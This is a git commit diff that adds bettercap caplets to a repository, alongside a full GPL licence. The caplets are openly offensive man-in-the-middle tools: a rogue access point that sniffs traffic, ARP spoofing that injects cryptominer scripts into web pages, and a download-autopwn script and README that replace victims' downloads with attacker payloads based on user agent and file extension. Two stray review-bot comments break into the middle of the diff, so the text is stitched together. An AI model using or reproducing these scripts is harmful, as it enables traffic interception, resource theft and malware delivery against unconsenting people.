commit 9be991b263d73ea797785efdb357a8268b2e0c33
Author: andatoshiki
Date: Sun Aug 25 04:29:40 2024 -0700
init: inital commit for complete raw root sources of project codebases
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..855f24d
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+gitspoof/evil_git_repo
diff --git a/LICENSE.md b/LICENSE.md
new file mode 100644
index 0000000..54c6296
--- /dev/null
+++ b/LICENSE.md
@@ -0,0 +1,596 @@ +GNU GENERAL PUBLIC LICENSE +========================== + +Version 3, 29 June 2007 + +Copyright © 2007 Free Software Foundation, Inc. <> + +Everyone is permitted to copy and distribute verbatim copies of this license +document, but changing it is not allowed. + +## Preamble + +The GNU General Public License is a free, copyleft license for software and other +kinds of works. + +The licenses for most software and other practical works are designed to take away +your freedom to share and change the works. By contrast, the GNU General Public +License is intended to guarantee your freedom to share and change all versions of a +program--to make sure it remains free software for all its users. We, the Free +Software Foundation, use the GNU General Public License for most of our software; it +applies also to any other work released this way by its authors. You can apply it to +your programs, too. + +When we speak of free software, we are referring to freedom, not price. Our General +Public Licenses are designed to make sure that you have the freedom to distribute +copies of free software (and charge for them if you wish), that you receive source +code or can get it if you want it, that you can change the software or use pieces of +it in new free programs, and that you know you can do these things. + +To protect your rights, we need to prevent others from denying you these rights or +asking you to surrender the rights. Therefore, you have certain responsibilities if +you distribute copies of the software, or if you modify it: responsibilities to +respect the freedom of others. + +For example, if you distribute copies of such a program, whether gratis or for a fee, +you must pass on to the recipients the same freedoms that you received. You must make +sure that they, too, receive or can get the source code. And you must show them these +terms so they know their rights. 
+ +Developers that use the GNU GPL protect your rights with two steps: (1) assert +copyright on the software, and (2) offer you this License giving you legal permission +to copy, distribute and/or modify it. + +For the developers' and authors' protection, the GPL clearly explains that there is +no warranty for this free software. For both users' and authors' sake, the GPL +requires that modified versions be marked as changed, so that their problems will not +be attributed erroneously to authors of previous versions. + +Some devices are designed to deny users access to install or run modified versions of +the software inside them, although the manufacturer can do so. This is fundamentally +incompatible with the aim of protecting users' freedom to change the software. The +systematic pattern of such abuse occurs in the area of products for individuals to +use, which is precisely where it is most unacceptable. Therefore, we have designed +this version of the GPL to prohibit the practice for those products. If such problems +arise substantially in other domains, we stand ready to extend this provision to +those domains in future versions of the GPL, as needed to protect the freedom of +users. + +Finally, every program is threatened constantly by software patents. States should +not allow patents to restrict development and use of software on general-purpose +computers, but in those that do, we wish to avoid the special danger that patents +applied to a free program could make it effectively proprietary. To prevent this, the +GPL assures that patents cannot be used to render the program non-free. + +The precise terms and conditions for copying, distribution and modification follow. + +## TERMS AND CONDITIONS + +### 0. Definitions. + +“This License” refers to version 3 of the GNU General Public License. + +“Copyright” also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. 
+ +“The Program” refers to any copyrightable work licensed under this +License. Each licensee is addressed as “you”. “Licensees” and +“recipients” may be individuals or organizations. + +To “modify” a work means to copy from or adapt all or part of the work in +a fashion requiring copyright permission, other than the making of an exact copy. The +resulting work is called a “modified version” of the earlier work or a +work “based on” the earlier work. + +A “covered work” means either the unmodified Program or a work based on +the Program. + +To “propagate” a work means to do anything with it that, without +permission, would make you directly or secondarily liable for infringement under +applicable copyright law, except executing it on a computer or modifying a private +copy. Propagation includes copying, distribution (with or without modification), +making available to the public, and in some countries other activities as well. + +To “convey” a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through a computer +network, with no transfer of a copy, is not conveying. + +An interactive user interface displays “Appropriate Legal Notices” to the +extent that it includes a convenient and prominently visible feature that (1) +displays an appropriate copyright notice, and (2) tells the user that there is no +warranty for the work (except to the extent that warranties are provided), that +licensees may convey the work under this License, and how to view a copy of this +License. If the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + +### 1. Source Code. + +The “source code” for a work means the preferred form of the work for +making modifications to it. “Object code” means any non-source form of a +work. 
+ +A “Standard Interface” means an interface that either is an official +standard defined by a recognized standards body, or, in the case of interfaces +specified for a particular programming language, one that is widely used among +developers working in that language. + +The “System Libraries” of an executable work include anything, other than +the work as a whole, that (a) is included in the normal form of packaging a Major +Component, but which is not part of that Major Component, and (b) serves only to +enable use of the work with that Major Component, or to implement a Standard +Interface for which an implementation is available to the public in source code form. +A “Major Component”, in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system (if any) on which +the executable work runs, or a compiler used to produce the work, or an object code +interpreter used to run it. + +The “Corresponding Source” for a work in object code form means all the +source code needed to generate, install, and (for an executable work) run the object +code and to modify the work, including scripts to control those activities. However, +it does not include the work's System Libraries, or general-purpose tools or +generally available free programs which are used unmodified in performing those +activities but which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for the work, and +the source code for shared libraries and dynamically linked subprograms that the work +is specifically designed to require, such as by intimate data communication or +control flow between those subprograms and other parts of the work. + +The Corresponding Source need not include anything that users can regenerate +automatically from other parts of the Corresponding Source. + +The Corresponding Source for a work in source code form is that same work. + +### 2. 
Basic Permissions. + +All rights granted under this License are granted for the term of copyright on the +Program, and are irrevocable provided the stated conditions are met. This License +explicitly affirms your unlimited permission to run the unmodified Program. The +output from running a covered work is covered by this License only if the output, +given its content, constitutes a covered work. This License acknowledges your rights +of fair use or other equivalent, as provided by copyright law. + +You may make, run and propagate covered works that you do not convey, without +conditions so long as your license otherwise remains in force. You may convey covered +works to others for the sole purpose of having them make modifications exclusively +for you, or provide you with facilities for running those works, provided that you +comply with the terms of this License in conveying all material for which you do not +control copyright. Those thus making or running the covered works for you must do so +exclusively on your behalf, under your direction and control, on terms that prohibit +them from making any copies of your copyrighted material outside their relationship +with you. + +Conveying under any other circumstances is permitted solely under the conditions +stated below. Sublicensing is not allowed; section 10 makes it unnecessary. + +### 3. Protecting Users' Legal Rights From Anti-Circumvention Law. + +No covered work shall be deemed part of an effective technological measure under any +applicable law fulfilling obligations under article 11 of the WIPO copyright treaty +adopted on 20 December 1996, or similar laws prohibiting or restricting circumvention +of such measures. 
+ +When you convey a covered work, you waive any legal power to forbid circumvention of +technological measures to the extent such circumvention is effected by exercising +rights under this License with respect to the covered work, and you disclaim any +intention to limit operation or modification of the work as a means of enforcing, +against the work's users, your or third parties' legal rights to forbid circumvention +of technological measures. + +### 4. Conveying Verbatim Copies. + +You may convey verbatim copies of the Program's source code as you receive it, in any +medium, provided that you conspicuously and appropriately publish on each copy an +appropriate copyright notice; keep intact all notices stating that this License and +any non-permissive terms added in accord with section 7 apply to the code; keep +intact all notices of the absence of any warranty; and give all recipients a copy of +this License along with the Program. + +You may charge any price or no price for each copy that you convey, and you may offer +support or warranty protection for a fee. + +### 5. Conveying Modified Source Versions. + +You may convey a work based on the Program, or the modifications to produce it from +the Program, in the form of source code under the terms of section 4, provided that +you also meet all of these conditions: + +* **a)** The work must carry prominent notices stating that you modified it, and giving a +relevant date. +* **b)** The work must carry prominent notices stating that it is released under this +License and any conditions added under section 7. This requirement modifies the +requirement in section 4 to “keep intact all notices”. +* **c)** You must license the entire work, as a whole, under this License to anyone who +comes into possession of a copy. This License will therefore apply, along with any +applicable section 7 additional terms, to the whole of the work, and all its parts, +regardless of how they are packaged. 
This License gives no permission to license the +work in any other way, but it does not invalidate such permission if you have +separately received it. +* **d)** If the work has interactive user interfaces, each must display Appropriate Legal +Notices; however, if the Program has interactive interfaces that do not display +Appropriate Legal Notices, your work need not make them do so. + +A compilation of a covered work with other separate and independent works, which are +not by their nature extensions of the covered work, and which are not combined with +it such as to form a larger program, in or on a volume of a storage or distribution +medium, is called an “aggregate” if the compilation and its resulting +copyright are not used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work in an aggregate +does not cause this License to apply to the other parts of the aggregate. + +### 6. Conveying Non-Source Forms. + +You may convey a covered work in object code form under the terms of sections 4 and +5, provided that you also convey the machine-readable Corresponding Source under the +terms of this License, in one of these ways: + +* **a)** Convey the object code in, or embodied in, a physical product (including a +physical distribution medium), accompanied by the Corresponding Source fixed on a +durable physical medium customarily used for software interchange. 
+* **b)** Convey the object code in, or embodied in, a physical product (including a +physical distribution medium), accompanied by a written offer, valid for at least +three years and valid for as long as you offer spare parts or customer support for +that product model, to give anyone who possesses the object code either (1) a copy of +the Corresponding Source for all the software in the product that is covered by this +License, on a durable physical medium customarily used for software interchange, for +a price no more than your reasonable cost of physically performing this conveying of +source, or (2) access to copy the Corresponding Source from a network server at no +charge. +* **c)** Convey individual copies of the object code with a copy of the written offer to +provide the Corresponding Source. This alternative is allowed only occasionally and +noncommercially, and only if you received the object code with such an offer, in +accord with subsection 6b. +* **d)** Convey the object code by offering access from a designated place (gratis or for +a charge), and offer equivalent access to the Corresponding Source in the same way +through the same place at no further charge. You need not require recipients to copy +the Corresponding Source along with the object code. If the place to copy the object +code is a network server, the Corresponding Source may be on a different server +(operated by you or a third party) that supports equivalent copying facilities, +provided you maintain clear directions next to the object code saying where to find +the Corresponding Source. Regardless of what server hosts the Corresponding Source, +you remain obligated to ensure that it is available for as long as needed to satisfy +these requirements. +* **e)** Convey the object code using peer-to-peer transmission, provided you inform +other peers where the object code and Corresponding Source of the work are being +offered to the general public at no charge under subsection 6d. 
+ +A separable portion of the object code, whose source code is excluded from the +Corresponding Source as a System Library, need not be included in conveying the +object code work. + +A “User Product” is either (1) a “consumer product”, which +means any tangible personal property which is normally used for personal, family, or +household purposes, or (2) anything designed or sold for incorporation into a +dwelling. In determining whether a product is a consumer product, doubtful cases +shall be resolved in favor of coverage. For a particular product received by a +particular user, “normally used” refers to a typical or common use of +that class of product, regardless of the status of the particular user or of the way +in which the particular user actually uses, or expects or is expected to use, the +product. A product is a consumer product regardless of whether the product has +substantial commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. + +“Installation Information” for a User Product means any methods, +procedures, authorization keys, or other information required to install and execute +modified versions of a covered work in that User Product from a modified version of +its Corresponding Source. The information must suffice to ensure that the continued +functioning of the modified object code is in no case prevented or interfered with +solely because modification has been made. + +If you convey an object code work under this section in, or with, or specifically for +use in, a User Product, and the conveying occurs as part of a transaction in which +the right of possession and use of the User Product is transferred to the recipient +in perpetuity or for a fixed term (regardless of how the transaction is +characterized), the Corresponding Source conveyed under this section must be +accompanied by the Installation Information. 
But this requirement does not apply if +neither you nor any third party retains the ability to install modified object code +on the User Product (for example, the work has been installed in ROM). + +The requirement to provide Installation Information does not include a requirement to +continue to provide support service, warranty, or updates for a work that has been +modified or installed by the recipient, or for the User Product in which it has been +modified or installed. Access to a network may be denied when the modification itself +materially and adversely affects the operation of the network or violates the rules +and protocols for communication across the network. + +Corresponding Source conveyed, and Installation Information provided, in accord with +this section must be in a format that is publicly documented (and with an +implementation available to the public in source code form), and must require no +special password or key for unpacking, reading or copying. + +### 7. Additional Terms. + +“Additional permissions” are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. Additional +permissions that are applicable to the entire Program shall be treated as though they +were included in this License, to the extent that they are valid under applicable +law. If additional permissions apply only to part of the Program, that part may be +used separately under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + +When you convey a copy of a covered work, you may at your option remove any +additional permissions from that copy, or from any part of it. (Additional +permissions may be written to require their own removal in certain cases when you +modify the work.) You may place additional permissions on material, added by you to a +covered work, for which you have or can give appropriate copyright permission. 
+ +Notwithstanding any other provision of this License, for material you add to a +covered work, you may (if authorized by the copyright holders of that material) +supplement the terms of this License with terms: + +* **a)** Disclaiming warranty or limiting liability differently from the terms of +sections 15 and 16 of this License; or +* **b)** Requiring preservation of specified reasonable legal notices or author +attributions in that material or in the Appropriate Legal Notices displayed by works +containing it; or +* **c)** Prohibiting misrepresentation of the origin of that material, or requiring that +modified versions of such material be marked in reasonable ways as different from the +original version; or +* **d)** Limiting the use for publicity purposes of names of licensors or authors of the +material; or +* **e)** Declining to grant rights under trademark law for use of some trade names, +trademarks, or service marks; or +* **f)** Requiring indemnification of licensors and authors of that material by anyone +who conveys the material (or modified versions of it) with contractual assumptions of +liability to the recipient, for any liability that these contractual assumptions +directly impose on those licensors and authors. + +All other non-permissive additional terms are considered “further +restrictions” within the meaning of section 10. If the Program as you received +it, or any part of it, contains a notice stating that it is governed by this License +along with a term that is a further restriction, you may remove that term. If a +license document contains a further restriction but permits relicensing or conveying +under this License, you may add to a covered work material governed by the terms of +that license document, provided that the further restriction does not survive such +relicensing or conveying. 
+ +If you add terms to a covered work in accord with this section, you must place, in +the relevant source files, a statement of the additional terms that apply to those +files, or a notice indicating where to find the applicable terms. + +Additional terms, permissive or non-permissive, may be stated in the form of a +separately written license, or stated as exceptions; the above requirements apply +either way. + +### 8. Termination. + +You may not propagate or modify a covered work except as expressly provided under +this License. Any attempt otherwise to propagate or modify it is void, and will +automatically terminate your rights under this License (including any patent licenses +granted under the third paragraph of section 11). + +However, if you cease all violation of this License, then your license from a +particular copyright holder is reinstated (a) provisionally, unless and until the +copyright holder explicitly and finally terminates your license, and (b) permanently, +if the copyright holder fails to notify you of the violation by some reasonable means +prior to 60 days after the cessation. + +Moreover, your license from a particular copyright holder is reinstated permanently +if the copyright holder notifies you of the violation by some reasonable means, this +is the first time you have received notice of violation of this License (for any +work) from that copyright holder, and you cure the violation prior to 30 days after +your receipt of the notice. + +Termination of your rights under this section does not terminate the licenses of +parties who have received copies or rights from you under this License. If your +rights have been terminated and not permanently reinstated, you do not qualify to +receive new licenses for the same material under section 10. + +### 9. Acceptance Not Required for Having Copies. + +You are not required to accept this License in order to receive or run a copy of the +Program. 
Ancillary propagation of a covered work occurring solely as a consequence of +using peer-to-peer transmission to receive a copy likewise does not require +acceptance. However, nothing other than this License grants you permission to +propagate or modify any covered work. These actions infringe copyright if you do not +accept this License. Therefore, by modifying or propagating a covered work, you +indicate your acceptance of this License to do so. + +### 10. Automatic Licensing of Downstream Recipients. + +Each time you convey a covered work, the recipient automatically receives a license +from the original licensors, to run, modify and propagate that work, subject to this +License. You are not responsible for enforcing compliance by third parties with this +License. + +An “entity transaction” is a transaction transferring control of an +organization, or substantially all assets of one, or subdividing an organization, or +merging organizations. If propagation of a covered work results from an entity +transaction, each party to that transaction who receives a copy of the work also +receives whatever licenses to the work the party's predecessor in interest had or +could give under the previous paragraph, plus a right to possession of the +Corresponding Source of the work from the predecessor in interest, if the predecessor +has it or can get it with reasonable efforts. + +You may not impose any further restrictions on the exercise of the rights granted or +affirmed under this License. For example, you may not impose a license fee, royalty, +or other charge for exercise of rights granted under this License, and you may not +initiate litigation (including a cross-claim or counterclaim in a lawsuit) alleging +that any patent claim is infringed by making, using, selling, offering for sale, or +importing the Program or any portion of it. + +### 11. Patents. 
+ +A “contributor” is a copyright holder who authorizes use under this +License of the Program or a work on which the Program is based. The work thus +licensed is called the contributor's “contributor version”. + +A contributor's “essential patent claims” are all patent claims owned or +controlled by the contributor, whether already acquired or hereafter acquired, that +would be infringed by some manner, permitted by this License, of making, using, or +selling its contributor version, but do not include claims that would be infringed +only as a consequence of further modification of the contributor version. For +purposes of this definition, “control” includes the right to grant patent +sublicenses in a manner consistent with the requirements of this License. + +Each contributor grants you a non-exclusive, worldwide, royalty-free patent license +under the contributor's essential patent claims, to make, use, sell, offer for sale, +import and otherwise run, modify and propagate the contents of its contributor +version. + +In the following three paragraphs, a “patent license” is any express +agreement or commitment, however denominated, not to enforce a patent (such as an +express permission to practice a patent or covenant not to sue for patent +infringement). To “grant” such a patent license to a party means to make +such an agreement or commitment not to enforce a patent against the party. 
+ +If you convey a covered work, knowingly relying on a patent license, and the +Corresponding Source of the work is not available for anyone to copy, free of charge +and under the terms of this License, through a publicly available network server or +other readily accessible means, then you must either (1) cause the Corresponding +Source to be so available, or (2) arrange to deprive yourself of the benefit of the +patent license for this particular work, or (3) arrange, in a manner consistent with +the requirements of this License, to extend the patent license to downstream +recipients. “Knowingly relying” means you have actual knowledge that, but +for the patent license, your conveying the covered work in a country, or your +recipient's use of the covered work in a country, would infringe one or more +identifiable patents in that country that you have reason to believe are valid. + +If, pursuant to or in connection with a single transaction or arrangement, you +convey, or propagate by procuring conveyance of, a covered work, and grant a patent +license to some of the parties receiving the covered work authorizing them to use, +propagate, modify or convey a specific copy of the covered work, then the patent +license you grant is automatically extended to all recipients of the covered work and +works based on it. + +A patent license is “discriminatory” if it does not include within the +scope of its coverage, prohibits the exercise of, or is conditioned on the +non-exercise of one or more of the rights that are specifically granted under this +License. 
You may not convey a covered work if you are a party to an arrangement with +a third party that is in the business of distributing software, under which you make +payment to the third party based on the extent of your activity of conveying the +work, and under which the third party grants, to any of the parties who would receive +the covered work from you, a discriminatory patent license (a) in connection with +copies of the covered work conveyed by you (or copies made from those copies), or (b) +primarily for and in connection with specific products or compilations that contain +the covered work, unless you entered into that arrangement, or that patent license +was granted, prior to 28 March 2007. + +Nothing in this License shall be construed as excluding or limiting any implied +license or other defenses to infringement that may otherwise be available to you +under applicable patent law. + +### 12. No Surrender of Others' Freedom. + +If conditions are imposed on you (whether by court order, agreement or otherwise) +that contradict the conditions of this License, they do not excuse you from the +conditions of this License. If you cannot convey a covered work so as to satisfy +simultaneously your obligations under this License and any other pertinent +obligations, then as a consequence you may not convey it at all. For example, if you +agree to terms that obligate you to collect a royalty for further conveying from +those to whom you convey the Program, the only way you could satisfy both those terms +and this License would be to refrain entirely from conveying the Program. + +### 13. Use with the GNU Affero General Public License. + +Notwithstanding any other provision of this License, you have permission to link or +combine any covered work with a work licensed under version 3 of the GNU Affero +General Public License into a single combined work, and to convey the resulting work. 
+The terms of this License will continue to apply to the part which is the covered +work, but the special requirements of the GNU Affero General Public License, section +13, concerning interaction through a network will apply to the combination as such. + +### 14. Revised Versions of this License. + +The Free Software Foundation may publish revised and/or new versions of the GNU +General Public License from time to time. Such new versions will be similar in spirit +to the present version, but may differ in detail to address new problems or concerns. + +Each version is given a distinguishing version number. If the Program specifies that +a certain numbered version of the GNU General Public License “or any later +version” applies to it, you have the option of following the terms and +conditions either of that numbered version or of any later version published by the +Free Software Foundation. If the Program does not specify a version number of the GNU +General Public License, you may choose any version ever published by the Free +Software Foundation. + +If the Program specifies that a proxy can decide which future versions of the GNU +General Public License can be used, that proxy's public statement of acceptance of a +version permanently authorizes you to choose that version for the Program. + +Later license versions may give you additional or different permissions. However, no +additional obligations are imposed on any author or copyright holder as a result of +your choosing to follow a later version. + +### 15. Disclaimer of Warranty. + +THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. +EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES +PROVIDE THE PROGRAM “AS IS” WITHOUT WARRANTY OF ANY KIND, EITHER +EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF +MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
THE ENTIRE RISK AS TO THE +QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE +DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. + +### 16. Limitation of Liability. + +IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY +COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM AS +PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, +INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE +PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE +OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE +WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE +POSSIBILITY OF SUCH DAMAGES. + +### 17. Interpretation of Sections 15 and 16. + +If the disclaimer of warranty and limitation of liability provided above cannot be +given local legal effect according to their terms, reviewing courts shall apply local +law that most closely approximates an absolute waiver of all civil liability in +connection with the Program, unless a warranty or assumption of liability accompanies +a copy of the Program in return for a fee. + +END OF TERMS AND CONDITIONS + +## How to Apply These Terms to Your New Programs + +If you develop a new program, and you want it to be of the greatest possible use to +the public, the best way to achieve this is to make it free software which everyone +can redistribute and change under these terms. + +To do so, attach the following notices to the program. It is safest to attach them +to the start of each source file to most effectively state the exclusion of warranty; +and each file should have at least the “copyright” line and a pointer to +where the full notice is found. 
+ + + Copyright (C) + + This program is free software: you can redistribute it and/or modify + it under the terms of the GNU General Public License as published by + the Free Software Foundation, either version 3 of the License, or + (at your option) any later version. + + This program is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + GNU General Public License for more details. + + You should have received a copy of the GNU General Public License + along with this program. If not, see . + +Also add information on how to contact you by electronic and paper mail. + +If the program does terminal interaction, make it output a short notice like this +when it starts in an interactive mode: + + Copyright (C) + This program comes with ABSOLUTELY NO WARRANTY; for details type 'show w'. + This is free software, and you are welcome to redistribute it + under certain conditions; type 'show c' for details. + +The hypothetical commands 'show w' and 'show c' should show the appropriate parts of +the General Public License. Of course, your program's commands might be different; +for a GUI interface, you would use an “about box”. + +You should also get your employer (if you work as a programmer) or school, if any, to +sign a “copyright disclaimer” for the program, if necessary. For more +information on this, and how to apply and follow the GNU GPL, see +<>. + +The GNU General Public License does not permit incorporating your program into +proprietary programs. If your program is a subroutine library, you may consider it +more useful to permit linking proprietary applications with the library. If this is +what you want to do, use the GNU Lesser General Public License instead of this +License. But first, please read +<>. diff --git a/Makefile b/Makefile new file mode 100644 index 0000000..1aba117 --- /dev/null +++ b/Makefile 
@@ -0,0 +1,4 @@
+install:
+ @mkdir -p /usr/local/share/bettercap/caplets
+ @cp -rf * /usr/local/share/bettercap/caplets/
+ @cp *.* /usr/local/share/bettercap/caplets/
diff --git a/ap.cap b/ap.cap
new file mode 100644
index 0000000..635c9a7
--- /dev/null
+++ b/ap.cap
@@ -0,0 +1,24 @@
+# interface to use to create the AP
+set wifi.ap.interface wlx00c0ca96e4b2
+# interface for upstream connectivity, comment to disable
+set wifi.ap.upstream wlp1s0
+# comment to create a free access point
+set wifi.ap.passphrase 12345678
+
+# enable the ap
+wifi.ap on
+
+# wait 2 seconds then set the session interface to the AP one
+sleep 2
+iface wlx00c0ca96e4b2
+
+set net.sniff.local true
+set net.sniff.verbose false
+set net.sniff.filter not arp and not udp port 53
+
+# start recon for clients
+net.recon on
+# sniff
+net.sniff on
+# run the https-ui caplet because it's cool
+https-ui
diff --git a/crypto-miner/crypto-miner.cap b/crypto-miner/crypto-miner.cap
new file mode 100644
index 0000000..b663a0f
--- /dev/null
+++ b/crypto-miner/crypto-miner.cap
@@ -0,0 +1,27 @@
+# this module lets you inject a javascript crypto miner
+#
+# targeting the whole subnet by default, to make it selective:
+#
+# sudo ./bettercap -caplet crypto-miner.cap -eval "set arp.spoof.targets 192.168.1.64"
+
+
+# set the name of the Miner: coinhive, cryptoloot or coinimp
+set cryptominer.name coinhive
+
+# set the key of the Miner
+set cryptominer.key 123456789
+
+# inject js miner
+set http.proxy.script crypto-miner.js
+
+# uncomment if you want sslstrip enabled
+#set http.proxy.sslstrip true
+
+# redirect http traffic to a proxy
+http.proxy on
+
+# wait for everything to start properly
+sleep 1
+
+# make sure probing is off as it conflicts with arp spoofing
+arp.spoof on
diff --git a/crypto-miner/crypto-miner.js b/crypto-miner/crypto-miner.js
new file mode 100644
index 0000000..1aa6321
--- /dev/null
+++ b/crypto-miner/crypto-miner.js
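Review bot: The second recipe line `@cp *.* /usr/local/share/bettercap/caplets/` re-copies files that the preceding `@cp -rf * /usr/local/share/bettercap/caplets/` has already installed, so it can be dropped. The destination directory is also hard-coded here and again inside download-autopwn.js (`readFile("/usr/local/share/bettercap/caplets/download-autopwn/" + ...)`), so the two must be kept in sync by hand; a `PREFIX ?= /usr/local` variable at the top of the Makefile would at least make that coupling visible to whoever changes the install location.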
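Review bot: `set wifi.ap.passphrase 12345678` commits a fixed eight-digit passphrase to the repository, so any access point started from this caplet as-is is protected by a value that is readable by anyone with the repo; leaving the line as a commented example and supplying the value at invocation time would keep a credential out of the checked-in file. The interface name `wlx00c0ca96e4b2` also appears twice (`set wifi.ap.interface wlx00c0ca96e4b2` and `iface wlx00c0ca96e4b2`), so a change to one must be mirrored on the other, which the comments do not mention.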
@@ -0,0 +1,40 @@ +var green = "\033[32m", + reset = "\033[0m" + +function onLoad() { + logStr = "Javascript Crypto Miner loaded.\n" + + "\n Miner: " + green + env["cryptominer.name"].charAt(0).toUpperCase() + env["cryptominer.name"].slice(1) + reset + + "\n Targets: " + green + env["arp.spoof.targets"] + reset + "\n" + log(logStr); +} + +function onResponse(req, res) { + if( res.ContentType.indexOf('text/html') == 0 ){ + var body = res.ReadBody(); + if( body.indexOf('') != -1 ) { + switch(env["cryptominer.name"]) { + case "coinhive": + res.Body = body.replace( + '', + '', + '' + ); + break; + case "cryptoloot": + res.Body = body.replace( + '', + '', + '' + ); + break; + case "coinimp": + res.Body = body.replace( + '', + '', + '' + ); + break; + } + } + } +} diff --git a/download-autopwn/README.md b/download-autopwn/README.md new file mode 100644 index 0000000..0948c4c --- /dev/null +++ b/download-autopwn/README.md @@ -0,0 +1,185 @@ +

+ + +### caplets/download-autopwn.cap + +Everything is configurable in the **download-autopwn.cap** file. + +```sh +# documentation can be found at https://github.com/bettercap/caplets/blob/master/download-autopwn/README.md +# +# this module lets you intercept very specific download requests and replaces the payload with one of your choice +# +# in order for a download to get intercepted: +# 1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value +# 2. the requested file must match one of the downloadautopwn.extensions.x file extensions +# +# you can find the downloadautopwn.devices in the caplets/download-autopwn/ folder (you can add your own) +# + +# choose the devices from which downloads get pwned (enter the dir names of choice from caplets/download-autopwn/) +# (or feel free to add your own) +set downloadautopwn.devices android,ios,linux,macos,ps4,windows,xbox + +# choose the regexp value that the victim's User-Agent has to match +# (feel free to add your own) +set downloadautopwn.useragent.android Android +set downloadautopwn.useragent.ios iPad|iPhone|iPod +set downloadautopwn.useragent.linux Linux +set downloadautopwn.useragent.macos Intel Mac OS X 10_ +set downloadautopwn.useragent.ps4 PlayStation 4 +set downloadautopwn.useragent.windows Windows|WOW64 +set downloadautopwn.useragent.xbox Xbox + +# choose which file extensions get intercepted and replaced by your payload on specific devices (payloads are in caplets/download-autopwn/.../) +# (again, you can add as many as you want) +# make sure the payload files exist and that they are all named "payload" (for example: payload.exe) +set downloadautopwn.extensions.android apk,pdf,sh,pfx,zip +set downloadautopwn.extensions.ios ipa,ios,ipb,ipsw,ipsx,ipcc,mobileconfig,pdf,zip +set downloadautopwn.extensions.linux c,go,sh,py,rb,cr,pl,deb,pdf,jar,zip +set downloadautopwn.extensions.macos app,dmg,doc,docx,jar,ai,ait,psd,pdf,c,go,sh,py,rb,pl,terminal,zip +set 
downloadautopwn.extensions.ps4 disc,pup,pdf,doc,docx,zip +set downloadautopwn.extensions.windows exe,msi,bat,jar,dll,doc,docx,swf,psd,ai,ait,pdf,rar,zip +set downloadautopwn.extensions.xbox exe,msi,jar,pdf,doc,docx,zip + +# choose whether the proxy module resizes your payload to the requested file's size (if not set then default=false) +set downloadautopwn.resizepayloads true + +# set download-autopwn.js as proxy script +set http.proxy.script caplets/download-autopwn.js +# uncomment if you want sslstrip enabled +# set http.proxy.sslstrip true +# start proxy +http.proxy on + +# wait for everything to start properly +sleep 1 + +# uncomment if you want arp spoofing (make sure probing is off as it conflicts with arp spoofing) +# arp.spoof on +``` + +
+ +The `downloadautopwn.devices` variable accepts comma separated values. +
+These values are the folder names inside the **caplets/download-autopwn/** directory. + +
+ +The `downloadautopwn.useragent.x` variables accept a regular expression value (where `x` is the device name). +
+The victim's User-Agent string has to match this regex value. + +
+ +The `downloadautopwn.extensions.x` variables accept comma separated file extensions that are present in the device's folder (where `x` is the device name). +
+These files must be present in the device's folder, and they must be called `payload` (for example: `payload.exe`). + +
+ +The `downloadautopwn.resizepayloads` variable accepts a boolean value (default=false). +
+If this value is set to true, your payloads will be resized to match the requested file's size (unless your payload is bigger or equal to the requested file's size). + +
+ +### caplets/download-autopwn.js + +No changes should have to be made in the **download-autopwn.js** file. + +```javascript +var targets = {} + +var nullbyte = "\u0000" + +var green = "\033[32m", + boldRed = "\033[1;31m", + onRed = "\033[41m", + reset = "\033[0m", + redLine = "\n " + onRed + " " + reset + +function onLoad() { + devices = env("downloadautopwn.devices").split(",") + logStr = "" + for (var i = 0; i < devices.length; i++) { + item = { + "device": devices[i], + "useragent": env("downloadautopwn.useragent." + devices[i]), + "extensions": env("downloadautopwn.extensions." + devices[i]).toLowerCase().split(",") + } + targets[i] = item + logStr += "\n " + green + targets[i]["device"] + reset + + "\n User-Agent: " + targets[i]["useragent"] + + "\n Extensions: " + targets[i]["extensions"] + "\n" + } + log("Download Autopwn loaded.\n\nDownload Autopwn targets: \n" + logStr) +} + +function onResponse(req, res) { + // First of all check whether the requested path might have an extension (to save cpu) + var requestedFileName = req.Path.replace(/.*\//g, "") + if ( requestedFileName.indexOf(".") != -1 ) { + var userAgent = req.GetHeader("User-Agent", ""), + extension, + headerCount = req.Headers.length + // Iterate through targets + for ( var t = 0; t < Object.keys(targets).length; t++ ) { + // Check if User-Agent is a target + regex = new RegExp(targets[t]["useragent"]) + if ( userAgent.match(regex) ) { + // Iterate through target extensions + for (var e = 0; e < targets[t]["extensions"].length; e++) { + // Check if requested path contains a targeted extension + // function endsWith() could be a nice simplification here + if ( requestedFileName.replace(/.*\./g, "").toLowerCase() == targets[t]["extensions"][e] ) { + extension = 